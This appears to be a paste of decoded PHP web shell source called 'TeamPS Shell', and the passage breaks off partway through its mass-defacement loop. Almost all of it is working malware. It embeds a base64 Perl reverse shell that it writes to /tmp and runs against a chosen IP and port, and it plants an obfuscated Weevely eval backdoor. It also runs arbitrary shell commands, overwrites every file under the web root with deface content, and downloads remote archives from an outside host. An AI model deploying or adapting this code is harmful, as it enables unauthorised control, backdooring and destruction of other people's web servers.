· 9 years ago · Dec 09, 2016, 12:44 PM
1/* Decoded by unphp.net */
2
3<?php
4//TeamPS Shell
5//By Plum & KrypTiK
6error_reporting(0);
7#chdir('');
8//Some basic var's
9if (!@$_GET['path']) {
10 $dir = CleanDir(getcwd());
11} else {
12 $dir = CleanDir($_GET['path']);
13}
14$rootdir = CleanDir($_SERVER['DOCUMENT_ROOT']);
15$domain = $_SERVER['HTTP_HOST'];
16$script = $_SERVER['SCRIPT_NAME'];
17$full_url = $_SERVER['REQUEST_URI'];
18$script2 = basename($script);
19$serverip = $_SERVER['SERVER_ADDR'];
20$userip = $_SERVER['REMOTE_ADDR'];
21$whoami = function_exists("posix_getpwuid") ? posix_getpwuid(posix_geteuid()) : exec("whoami");
22$whoami = function_exists("posix_getpwuid") ? $whoami['name'] : exec("whoami");
23$disabled = ini_get('disable_functions');
24//Perl back connect script by LorD
25//Encoded in base64 for convenience
26$bcperl_source = "IyEvdXNyL2Jpbi9wZXJsIA0KdXNlIElPOjpTb2NrZXQ7IA0KIyAgIFByaXY4ICoqIFByaXY4ICoqIFByaXY4IA0KIyBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgQ29ubmVjdCBCYWNrIFNoZWxsICAgICAgICAgIA0KIyBjb2RlIGJ5OkxvckQgDQojIFdlIEFyZSA6TG9yRC1DMGQzci1OVC1ceDkwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbSANCiMgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1VzYWdlOiBkYy5wbCBbSG9zdF0gW1BvcnRdIA0KIyANCiNFeDogZGMucGwgMTI3LjAuMC4xIDIxMjEgDQojbG9yZEBTbGFja3dhcmVMaW51eDovaG9tZS9wcm9ncmFtaW5nJCBwZXJsIGRjLnBsIDEyNy4wLjAuMSAyMTIxIA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0gDQojIA0KI1sqXSBSZXNvbHZpbmcgSG9zdE5hbWUgDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xIA0KI1sqXSBTcGF3bmluZyBTaGVsbCANCiNbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjEgDQojbGlzdGVuaW5nIG9uIFthbnldIDIxMjEgLi4uIA0KI2Nvbm5lY3QgdG8gWzEyNy4wLjAuMV0gZnJvbSBsb2NhbGhvc3QgWzEyNy4wLjAuMV0gMzI3NjkgDQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLSANCiMgDQojLS09PVN5c3RlbWluZm89PS0tIA0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eCANCiMgDQojLS09PVVzZXJpbmZvPT0tLSANCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKSANCiMgDQojLS09PURpcmVjdG9yeT09LS0gDQojL3Jvb3QgDQojIA0KIy0tPT1TaGVsbD09LS0gDQojIA0KJHN5c3RlbSAgID0gJy9iaW4vYmFzaCc7IA0KJEFSR0M9QEFSR1Y7IA0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1JcblxuIjsgDQppZiAoJEFSR0MhPTIpIHsgDQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7IA0KICAgZGllICJFeDogJDAgMTI3LjAuMC4xIDIxMjEgXG4iOyANCn0gDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyANCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7IA0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsgDQpwcmludCAiWypdIFJlc29sdmluZyBIb3N0TmFtZVxuIjsgDQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOyANCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOyANCnByaW50ICJbKl0gQ29ubmVjdGVkIHRvIHJlbW90ZSBob3N0IFxuIjsgDQpTT0NLRVQtPmF1dG9mbHVzaCgpOyANCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOyANCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOyANCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOyANCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SICBcblxuIjsgDQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOyANCmVjaG8gLS09PVVzZXJpbmZvPT0tLSA7IGlkO2VjaG87ZWNobyAtLT09RGlyZWN0b3J5PT0tLSA7IHB3ZDtlY2hvOyBlY2hvIC0tPT1TaGVsbD09LS0gIik7IA0Kc3lzdGVtKCRzeXN0ZW0pOyANCiNFT0Y=";
27@ini_set("memory_limit", "9999M");
28@ini_set("max_execution_time", "0");
29@ini_set("upload_max_filesize", "9999m");
30@ini_set("magic_quotes_gpc", "0");
31@set_magic_quotes_runtime(0);
32set_time_limit(0);
33if (empty($disabled)) {
34 $disabled = "None";
35}
36//Some functions
37function CleanDir($directory) {
38 $directory = str_replace("", "/", $directory);
39 $directory = str_replace("//", "/", $directory);
40 return $directory;
41}
42function success($for, $var1) {
43 $domain = $_SERVER['HTTP_HOST'];
44 $script = $_SERVER['SCRIPT_NAME'];
45 $full_url = $_SERVER['REQUEST_URI'];
46 if ($for == "filesave") {
47 $message = "File Saved!";
48 $redirect = "http://$domain$script?path=$var1";
49 }
50 if ($for == "filedelete") {
51 $message = "File Deleted!";
52 $redirect = "http://$domain$script?path=$var1";
53 }
54 if ($for == "createdir") {
55 $message = "Directory Created!";
56 $redirect = "http://$domain$script?path=$var1";
57 }
58 if ($for == "dir_exists") {
59 $message = "Directory Already Exists!";
60 $redirect = "http://$domain$script?path=$var1";
61 }
62 if ($for == "file_exists") {
63 $message = "File Already Exists!";
64 $redirect = "http://$domain$script?editfile=$var1";
65 }
66 if ($for == "file_created") {
67 $message = "File Created!";
68 $redirect = "http://$domain$script?editfile=$var1";
69 }
70 if ($for == "file_uploaded") {
71 $message = "File Uploaded!";
72 $redirect = "http://$domain$full_url";
73 }
74 if ($for == "shell_killed") {
75 $message = "Shell Killed!";
76 $redirect = "http://$domain$script";
77 }
78 if ($for == "dir_del") {
79 $message = "Directory Deleted!";
80 $redirect = "http://$domain$script?path=$var1";
81 }
82 if ($for == "dir_renamed") {
83 $message = "Directory Renamed!";
84 $redirect = "http://$domain$script?path=$var1";
85 }
86 if ($for == "file_renamed") {
87 $message = "File Renamed!";
88 $redirect = "http://$domain$script?path=$var1";
89 }
90 if ($for == "configs_found") {
91 $message = "$var1 Configs Found!";
92 $redirect = "";
93 }
94 if ($for == "unzip") {
95 $message = "Successfully Unzipped File!";
96 $redirect = "http://$domain$script?path=$var1";
97 }
98 if ($for == "files_found") {
99 $message = "$var1 files found!";
100 $redirect = "";
101 }
102 if ($for == "weevely") {
103 $message = "Weevely BackDoor Installed!";
104 $redirect = "";
105 }
106 echo "<div id='xbox'><embed
107 src='http://p0wersurge.com/js/achievementnopic.swf'
108 width='300'
109 height='80'
110 flashvars='Text=$message&gs=1337'
111 wmode='transparent'/></div>";
112 if (empty($redirect)) {
113 echo "<script>
114function remove (){
115 document.getElementById('xbox').innerHTML='';
116}
117setInterval(function(){remove();}, 2700);
118</script>";
119 } else {
120 echo "<script>
121function remove (){
122 window.location = '$redirect'
123}
124setInterval(function(){remove();}, 2500);
125</script>";
126 }
127}
128function error($mesg) {
129 $error = "<center><font size='4' color='red'><b>$mesg</b></font></center>";
130 echo "$error";
131}
132function ByteConversion($bytes, $precision = 2) {
133 $kilobyte = 1024;
134 $megabyte = $kilobyte * 1024;
135 $gigabyte = $megabyte * 1024;
136 $terabyte = $gigabyte * 1024;
137 if (($bytes >= 0) && ($bytes < $kilobyte)) {
138 return $bytes . ' B';
139 } elseif (($bytes >= $kilobyte) && ($bytes < $megabyte)) {
140 return round($bytes / $kilobyte, $precision) . ' KB';
141 } elseif (($bytes >= $megabyte) && ($bytes < $gigabyte)) {
142 return round($bytes / $megabyte, $precision) . ' MB';
143 } elseif (($bytes >= $gigabyte) && ($bytes < $terabyte)) {
144 return round($bytes / $gigabyte, $precision) . ' GB';
145 } elseif ($bytes >= $terabyte) {
146 return round($bytes / $terabyte, $precision) . ' TB';
147 } else {
148 return $bytes . ' B';
149 }
150}
151//Mass File Function
152function files($mass_dir) {
153 if ($dh = opendir($mass_dir)) {
154 $files = array();
155 $inner_files = array();
156 while ($file = readdir($dh)) {
157 if ($file != "." && $file != ".." && $file[0] != '.') {
158 if (is_dir($mass_dir . "/" . $file)) {
159 $inner_files = files("$mass_dir/$file");
160 if (is_array($inner_files)) $files = array_merge($files, $inner_files);
161 } else {
162 array_push($files, "$mass_dir/$file");
163 }
164 }
165 }
166 closedir($dh);
167 return $files;
168 }
169}
170//Execute command
171function cmd2($cmd, $path) {
172 chdir($path);
173 $disabled = ini_get('disable_functions');
174 if (empty($disabled)) {
175 $disabled = "None";
176 }
177 if ($disabled == "None") {
178 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
179 while (!feof($io[1])) {
180 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
181 }
182 while (!feof($io[2])) {
183 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
184 }
185 fclose($io[1]);
186 fclose($io[2]);
187 proc_close($execute);
188 return $res;
189 } elseif (function_exists("proc_open")) {
190 $execute = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
191 while (!feof($io[1])) {
192 $res.= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
193 }
194 while (!feof($io[2])) {
195 $res.= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
196 }
197 fclose($io[1]);
198 fclose($io[2]);
199 proc_close($execute);
200 return $res;
201 } elseif (function_exists("exec")) {
202 $res = exec($cmd);
203 return $res;
204 } elseif (function_exists("system")) {
205 $res = system($cmd);
206 return $res;
207 } elseif (function_exists("shell_exec")) {
208 $res = shell_exec($cmd);
209 return $res;
210 } elseif (function_exists("passthru")) {
211 $res = passthru($cmd);
212 return $res;
213 } else {
214 error("The necessary functions to execute commands are disabled!");
215 }
216}
217//Salt generator
218function gen_salt($length) {
219 $characters = array("a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "l", "L", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", "1", "2", "3", "4", "5", "6", "7", "8", "9");
220 $i = 0;
221 $salt = "";
222 while ($i < $length) {
223 $arrand = array_rand($characters, 1);
224 $salt.= $characters[$arrand];
225 $i++;
226 }
227 return $salt;
228}
229//Unzip function
230function unzip($filename, $directory) {
231 $zip = new ZipArchive;
232 $res = $zip->open($filename);
233 if ($res === TRUE) {
234 $zip->extractTo($directory);
235 $zip->close();
236 success("unzip", $directory);
237 } else {
238 cmd2("unzip $filename", $directory);
239 }
240}
241//Get files and directories and throw them into an array.
242$open = opendir($dir);
243$files = array();
244$direcs = array();
245while ($file = readdir($open)) {
246 if ($file != "." && $file != "..") {
247 if (is_dir("$dir/$file")) {
248 array_push($direcs, $file);
249 } else {
250 array_push($files, $file);
251 }
252 }
253}
254asort($direcs);
255asort($files);
256//echo out header
257echo "<pre>
258<center>
259<font size='2' color='#14ab00'>
260TTTTTTTTTTTTTTTTTTTTTTT PPPPPPPPPPPPPPPPP SSSSSSSSSSSSSSS
261T:::::::::::::::::::::T P::::::::::::::::P SS:::::::::::::::S
262T:::::::::::::::::::::T P::::::PPPPPP:::::P S:::::SSSSSS::::::S
263T:::::TT:::::::TT:::::T PP:::::P P:::::PS:::::S SSSSSSS
264TTTTTT T:::::T TTTTTTeeeeeeeeeeee aaaaaaaaaaaaa mmmmmmm mmmmmmm P::::P P:::::PS:::::S
265 T:::::T ee::::::::::::ee a::::::::::::a mm:::::::m m:::::::mm P::::P P:::::PS:::::S
266 T:::::T e::::::eeeee:::::eeaaaaaaaaa:::::a m::::::::::mm::::::::::m P::::PPPPPP:::::P S::::SSSS
267 T:::::T e::::::e e:::::e a::::a m::::::::::::::::::::::m P:::::::::::::PP SS::::::SSSSS
268 T:::::T e:::::::eeeee::::::e aaaaaaa:::::a m:::::mmm::::::mmm:::::m P::::PPPPPPPPP SSS::::::::SS
269 T:::::T e:::::::::::::::::e aa::::::::::::a m::::m m::::m m::::m P::::P SSSSSS::::S
270 T:::::T e::::::eeeeeeeeeee a::::aaaa::::::a m::::m m::::m m::::m P::::P S:::::S
271 T:::::T e:::::::e a::::a a:::::a m::::m m::::m m::::m P::::P S:::::S
272 TT:::::::TT e::::::::e a::::a a:::::a m::::m m::::m m::::mPP::::::PP SSSSSSS S:::::S
273 T:::::::::T e::::::::eeeeeeeea:::::aaaa::::::a m::::m m::::m m::::mP::::::::P S::::::SSSSSS:::::S
274 T:::::::::T ee:::::::::::::e a::::::::::aa:::am::::m m::::m m::::mP::::::::P S:::::::::::::::SS
275 TTTTTTTTTTT eeeeeeeeeeeeee aaaaaaaaaa aaaammmmmm mmmmmm mmmmmmPPPPPPPPPP SSSSSSSSSSSSSSS
276<a class ='navbar' href='http://p0wersurge.com'>p0wersurge</a> ©2012 Plum & KrypTiK
277
278</font>
279</center>
280</pre>";
281//echo out system info misc bar
282echo "<table border='1' width='100%'>
283<tr>
284<th>User</th>
285<th>System</th>
286<th>Server Software</th>
287<th>safe_mode</th>
288<th>open_basedir</th>
289<th>Disable Functions</th>
290<th>Your IP</th>
291<th>Server IP</th>
292</tr>";
293$system = php_uname();
294$software = $_SERVER['SERVER_SOFTWARE'];
295if (strpos($software, "Win") != FALSE) {
296 $whoami = strstr($whoami, "");
297 $whoami = substr($whoami, 1);
298}
299$safemode = ini_get('safe_mode');
300if ($safemode) {
301 $safemode = "Enabled";
302} else {
303 $safemode = "Disabled";
304}
305$openbase = ini_get('open_basedir');
306if ($openbase) {
307 $openbase = "Enabled";
308} else {
309 $openbase = "Disabled";
310}
311echo "<tr>
312<td>$whoami</td>
313<td>$system</td>
314<td>$software</td>
315<td>$safemode</td>
316<td>$openbase</td>
317<td>$disabled</td>
318<td>$userip</td>
319<td>$serverip</td>
320</tr>
321</table>
322<br>";
323//Navbar will go here.
324//Basic for now
325echo "<center><font size='4' color='#14ab00'><b>
326[~<a href='http://$domain$script' class='navbar'>Home</a>~]
327[~<a href='http://$domain$script?installMySQL' class='navbar'>Install MSD</a>~]
328[~<a href='http://$domain$script?massdeface' class='navbar'>Mass Deface</a>~]
329[~<a href='http://$domain$script?massinfect' class='navbar'>Mass File Infect</a>~]
330[~<a href='http://$domain$script?config' class='navbar'>Config Finder</a>~]
331[~<a href='http://$domain$script?search' class='navbar'>File Search</a>~]
332[~<a href='http://$domain$script?encrypt' class='navbar'>Encrypt String</a>~]
333[~<a href='http://$domain$script?kill' class='navbar'>Kill</a>~]<br>
334</font>
335<font size='3.5' color='#14ab00'>
336[~<a href='http://$domain$script?sms' class='navbar'>SMS Bomber</a>~]
337[~<a href='http://$domain$script?domaininfo' class='navbar'>Domain Information</a>~]
338[~<a href='http://$domain$script?back' class='navbar'>Back Connect</a>~]
339[~<a href='http://$domain$script?weev' class='navbar'>Weevely Backdoor</a>~]
340[~<a href='http://$domain$script?symlink' class='navbar'>Symlink</a>~]
341[~<a href='http://$domain$script?scan' class='navbar'>Port Scan</a>~]
342</b></font></center><br>";
343//End navbar
344//Anything you want echo'd out between misc system bar
345//and misc file bar put below here!
346//Back connect
347if (isset($_GET['back'])) {
348 echo "
349 <form method='POST'>
350 <center>
351 <font color='#14ab00'>
352 IP: <input type='text' class='text' name='ip' value='$userip' />
353 Port: <input type='text' class='text' name='port' value='2121' size='3'/><br>
354 <input type='submit' name='backC' value='Connect' />
355 </font>
356 </center>
357 </form>
358 ";
359 if (isset($_POST['backC'])) {
360 $port = $_POST['port'];
361 $bcip = $_POST['ip'];
362 $bc_decode = base64_decode($bcperl_source);
363 if (is_dir('/tmp')) {
364 if (file_put_contents("/tmp/bc.pl", $bc_decode)) {
365 $bc_command = "perl /tmp/bc.pl $bcip $port";
366 cmd2($bc_command, $dir);
367 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
368 } else {
369 error("Failed to write perl script to /tmp!");
370 }
371 } elseif (is_writeable($dir)) {
372 if (file_put_contents("$dir/bc.pl", $bc_decode)) {
373 $bc_command = "perl $dir/bc.pl $bcip $port";
374 cmd2($bc_command, $dir);
375 echo "<center><font color='#14ab00' size='3'>Trying to connect!</font></center><br>";
376 } else {
377 error("Failed to write perl script to $dir!");
378 }
379 } else {
380 error("/tmp does not exist and current directory is not writable!");
381 }
382 }
383}
384//Weevely backdoor
385if (isset($_GET['weev'])) {
386 echo "<center><font color='#14ab00' size='3'>
387<form action='' method='post'>
388Directory to install weevely backdoor:<br>
389<input type='text' name='weev_dir' size='50' class='text' value='$dir'><br>
390Name of file (something .php):<br>
391<input type='text' name='weev_name' class='text' value='weevely.php'><br>
392Password (more than 3 characters):<br>
393<input type='text' name='weev_pass' class='text'><br>
394<input type='submit' name='install_weev' value='BackDoor'><br>
395</font>
396</center>";
397}
398if (isset($_POST['install_weev'])) {
399 $weevdir = rtrim($_POST['weev_dir'], '/');;
400 $weevname = $_POST['weev_name'];
401 $weevpassword = $_POST['weev_pass'];
402 if (strlen($weevpassword) < 3) {
403 error("Password must be longer than 3 characters!");
404 } else {
405 $first2 = $weevpassword[0] . $weevpassword[1];
406 $rest = substr($weevpassword, 2);
407 $money = "$";
408 $weevelybd1 = base64_decode('ZnVuY3Rpb24gd2VldmVseSgpIHsNCiRjPSdjb3VudCc7DQokYT0kX0NPT0tJRTs=');
409 $weevelybd2 = "if(reset($money" . "a)=='" . $first2 . "' && $money" . "c($money" . "a)>3) {";
410 $weevelybd3 = "$money" . "k='$rest';";
411 $weevelybd4 = base64_decode('ZWNobyAnPCcuJGsuJz4nOw0KZXZhbChiYXNlNjRfZGVjb2RlKHByZWdfcmVwbGFjZShhcnJheSgnL1teXHc9XHNdLycsJy9ccy8nKSwgYXJyYXkoJycsJysnKSwgam9pbihhcnJheV9zbGljZSgkYSwkYygkYSktMykpKSkpOw0KZWNobyAnPC8nLiRrLic+JzsNCn0NCn0NCndlZXZlbHkoKTs=');
412 $all = "<?php
413eval(base64_decode('" . base64_encode($weevelybd1 . $weevelybd2 . $weevelybd3 . $weevelybd4) . "'));
414?>";
415 if (file_put_contents($weevdir . '/' . $weevname, $all)) {
416 echo "<center><font color='#14ab00' size='3'>Usage: weevely [URL of backdoor] [password]</font></center><br>";
417 success("weevely");
418 } else {
419 error("Failed to write backdoor to $weevdir");
420 }
421 }
422}
423//Edit file stuff
424if (!empty($_GET['editfile'])) {
425 $edfile = $_GET['editfile'];
426 $redirectloc = dirname($edfile);
427 echo "<form method='POST'><center>";
428 if (file_exists($edfile)) {
429 if (get_magic_quotes_gpc()) {
430 $file_content = htmlspecialchars(stripslashes(file_get_contents($edfile)));
431 } else {
432 $file_content = htmlspecialchars(file_get_contents($edfile));
433 }
434 if (is_writeable($edfile)) {
435 echo "<textarea rows='20' cols='150' name='edfile_contents' style='color:#000000'>$file_content</textarea>
436<br><br>
437 <input type='submit' name='savedit' value='Save' />
438 <input type='submit' name='deletefile' value='Delete' />
439 </form></center>";
440 if (isset($_POST['savedit'])) {
441 if (get_magic_quotes_gpc()) {
442 $edfilecontent = stripslashes($_POST['edfile_contents']);
443 } else {
444 $edfilecontent = $_POST['edfile_contents'];
445 }
446 if (file_put_contents($edfile, $edfilecontent)) {
447 success("filesave", rtrim($redirectloc, "/"));
448 } else {
449 error("Failed to save file!");
450 }
451 } else if (isset($_POST['deletefile'])) {
452 if (unlink($edfile)) {
453 success("filedelete", rtrim($redirectloc, '/'));
454 } else {
455 error("Failed to delete file!");
456 }
457 }
458 } else {
459 echo "<font color='red'><b>File is read only!</b></font><br>
460<textarea readonly rows='20' cols='150' name='edfile_contents'>$file_content</textarea><br><br>";
461 }
462 echo "</center>";
463 } else {
464 echo "<form method='POST'><center>";
465 echo "<font color='red'><b>File does not exist!</b></font><br>
466<textarea rows='20' cols='150' name='newfile_contents' style='color:#000'>
467</textarea><br><br>
468 <input type='submit' name='savefile' value='Create File' /><br /><br />
469 </form></center>";
470 if (isset($_POST['savefile'])) {
471 if (get_magic_quotes_gpc()) {
472 $newfilecontent = stripslashes($_POST['newfile_contents']);
473 } else {
474 $newfilecontent = $_POST['newfile_contents'];
475 }
476 if (file_put_contents($edfile, $newfilecontent)) {
477 success("filesave", rtrim($redirectloc, "/"));
478 } else {
479 error("Failed to save file!");
480 }
481 }
482 }
483}
484//Make directory stuff
485if (isset($_POST['do_create_dir'])) {
486 $cdir = $_POST['create_dir'];
487 if (is_dir($cdir)) {
488 success("dir_exists", $cdir);
489 } else {
490 if (mkdir($cdir, 0777)) {
491 success("createdir", $cdir);
492 } else {
493 error("Directory was not created!");
494 }
495 }
496}
497//Make file stuff
498if (isset($_POST['do_create_file'])) {
499 $cfile = $_POST['create_file'];
500 if (file_exists($cfile)) {
501 success("file_exists", $cfile);
502 } else {
503 if (fopen($cfile, "w+")) {
504 success("file_created", $cfile);
505 } else {
506 error("File was not created");
507 }
508 }
509}
510//Go directory
511if (isset($_POST['do_go_dir'])) {
512 $godir = $_POST['go_dir'];
513 echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
514}
515//Go Edit file
516if (isset($_POST['do_go_edit'])) {
517 $gefile = $_POST['go_edit_file'];
518 if (file_exists($gefile)) {
519 header("Location: http://$domain$script?editfile=$gefile");
520 } else {
521 error("File does not exist!");
522 }
523}
524//Upload File
525if (isset($_POST['do_upload_file'])) {
526 $udir = $_POST['upload_location'];
527 $uname = $_FILES['upload_file']['name'];
528 $both = "$udir$uname";
529 if (file_exists($both)) {
530 success("file_exists", $both);
531 } else {
532 switch ($_FILES['upload_file']['error']) {
533 case 0:
534 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
535 success("file_uploaded");
536 } else {
537 error("Failed To Upload File!");
538 }
539 }
540 }
541}
542//Kill Shell
543if (isset($_GET['kill'])) {
544 if (unlink("$dir/$script2")) {
545 success("shell_killed");
546 } else {
547 error("Failed to kill shell!");
548 }
549}
550//Install MySQL Tool
551if (isset($_GET['installMySQL'])) {
552 echo "<center>
553<font size='4'>
554<a href='?msd1' class='navbar'>Install MySQL Dumper v2.0 By: Plum</a>
555<br>
556<br>
557<a href='?msd2' class='navbar'>Install MySQL Dumper v1.24.4 (Original MSD)</a>
558</font>
559</center>
560<br>";
561}
562//MSD 1 stuff
563if (isset($_GET['msd1'])) {
564 echo "<center>
565<font color='#14ab00' size='3'>
566Directory to install to:<br>
567If directory does not exist it will attempt to create it.
568<form action='' method='post'>
569<input type='text' name='msd1dir' class='text' size='50' value='$dir/msd'>
570<input type='submit' name='installmsd1' value='Install'>
571<form>
572</font>
573</center>
574<br>";
575}
576if (isset($_POST['installmsd1'])) {
577 $msd1dir = rtrim($_POST['msd1dir'], "/");
578 $msd1dir2 = "$msd1dir/msdv2.zip";
579 if (!is_dir($msd1dir)) {
580 if (!mkdir($msd1dir, 0777)) {
581 error("Failed to make directory $msd1dir");
582 }
583 }
584 $link = file_get_contents("http://p0wersurge.com/msdv2.zip");
585 if (file_put_contents($msd1dir2, $link)) {
586 unzip($msd1dir2, $msd1dir);
587 } else {
588 error("Could not write to $msd1dir");
589 }
590}
591//MSD 2 stuff
592if (isset($_GET['msd2'])) {
593 echo "<center>
594<font color='#14ab00' size='3'>
595Directory to install to:<br>
596If directory does not exist it will attempt to create it.
597<form action='' method='post'>
598<input type='text' name='msd2dir' class='text' size='50' value='$dir/msd'>
599<input type='submit' name='installmsd2' value='Install'>
600<form>
601</font>
602</center>
603<br>";
604}
605if (isset($_POST['installmsd2'])) {
606 $msd2dir = rtrim($_POST['msd2dir'], "/");
607 $msd2dir2 = "$msd2dir/msd.zip";
608 if (!is_dir($msd2dir)) {
609 if (!mkdir($msd2dir, 0777)) {
610 error("Failed to make directory $msd2dir");
611 }
612 }
613 $link = file_get_contents("http://p0wersurge.com/msd.zip");
614 if (file_put_contents($msd2dir2, $link)) {
615 unzip($msd2dir2, $msd2dir);
616 } else {
617 error("Could not write to $msd2dir");
618 }
619}
620//Delete Directory
621if (isset($_GET['deldir'])) {
622 $deldir = $_GET['deldir'];
623 $redir = dirname($deldir);
624 if (rmdir($deldir)) {
625 success("dir_del", rtrim($redir, '/'));
626 } else {
627 error("Failed to delete directory!");
628 }
629}
630//Rename Directory
631if (isset($_GET['rendir'])) {
632 $rendir = $_GET['rendir'];
633 $dend = $_GET['old'];
634 echo "<center>
635<form action='' method='post'>
636<input type='text' class='text' name='new_dir_name' value='$dend'>
637<input type='submit' name='do_rename_dir' value='Rename'>
638</center>";
639}
640if (isset($_POST['do_rename_dir'])) {
641 $newdir = $_POST['new_dir_name'];
642 $rendir = $_GET['rendir'];
643 $dend = $_GET['old'];
644 if (rename("$rendir/$dend", "$rendir/$newdir")) {
645 success("dir_renamed", $rendir);
646 } else {
647 error("Directory was not renamed!");
648 }
649}
650//Delete file
651if (isset($_GET['delfile'])) {
652 $delfile = $_GET['delfile'];
653 $redir = dirname($delfile);
654 if (unlink($delfile)) {
655 success("filedelete", rtrim($redir, '/'));
656 } else {
657 error("Failed to delete file!");
658 }
659}
660//Rename File
661if (isset($_GET['renfile'])) {
662 $renfile = $_GET['renfile'];
663 $fend = $_GET['old'];
664 echo "<center>
665<form action='' method='post'>
666<input type='text' class='text' name='new_file_name' value='$fend'>
667<input type='submit' name='do_rename_file' value='Rename'>
668</center>";
669}
670if (isset($_POST['do_rename_file'])) {
671 $newfile = $_POST['new_file_name'];
672 $renfile = $_GET['renfile'];
673 $fend = $_GET['old'];
674 if (rename("$renfile/$fend", "$renfile/$newfile")) {
675 success("file_renamed", $renfile);
676 } else {
677 error("File was not renamed!");
678 }
679}
680//Mass Files Stuff
681if (isset($_POST['mass_files'])) {
682 $action = $_POST['mass_action'];
683 $chmodvalue = $_POST['chmod_value'];
684 $box = $_POST['delbox'];
685 if ($action == "Delete") {
686 foreach ($box as $b) {
687 if (is_dir($b)) {
688 if (rmdir($b)) {
689 echo "<font color='green'>Deleted Directory: $b</font><br>";
690 } else {
691 echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
692 }
693 } else {
694 if (unlink($b)) {
695 echo "<font color='green'>Deleted File: $b</font><br>";
696 } else {
697 echo "<font color='red'>Failed To Delete file: $b</font><br>";
698 }
699 }
700 }
701 }
702 if ($action == "chmod") {
703 foreach ($box as $b) {
704 if (is_dir($b)) {
705 if (chmod($b, $chmodvalue)) {
706 echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
707 } else {
708 echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
709 }
710 } else {
711 if (chmod($b, $chmodvalue)) {
712 echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
713 } else {
714 echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
715 }
716 }
717 }
718 }
719}
720//Mass Defacer
721if (isset($_POST['do_mass_deface'])) {
722 if (get_magic_quotes_gpc()) {
723 $mass_source = stripslashes($_POST['massdeface_source']);
724 } else {
725 $mass_source = $_POST['massdeface_source'];
726 }
727 $def_dir = $_POST['deface_dir'];
728 $custom_dir = $_POST['custom_dir'];
729 $custom_dir = rtrim($custom_dir, "/");
730 $failed = 0;
731 $success = 0;
732 if (empty($mass_source)) {
733 error("You must enter a source!");
734 } elseif (empty($custom_dir) && $def_dir == "custom") {
735 error("You must enter a custom directory when using the Custom option!");
736 } else {
737 if ($def_dir == "root") {
738 $mddir = $rootdir;
739 }
740 if ($def_dir == "custom") {
741 $mddir = $custom_dir;
742 }
743 foreach (files($mddir) as $key => $file) {
744 $file2 = trim($file, ".");
745 if ("$file2" == "$dir/$script2") {
746 echo "";
747 } else {
748 if (file_put_contents("$file2", $mass_source)) {
749 echo "<font color='green'><b>Successfully defaced file: $file2</b></font><br>";
750 $success++;
751 } else {
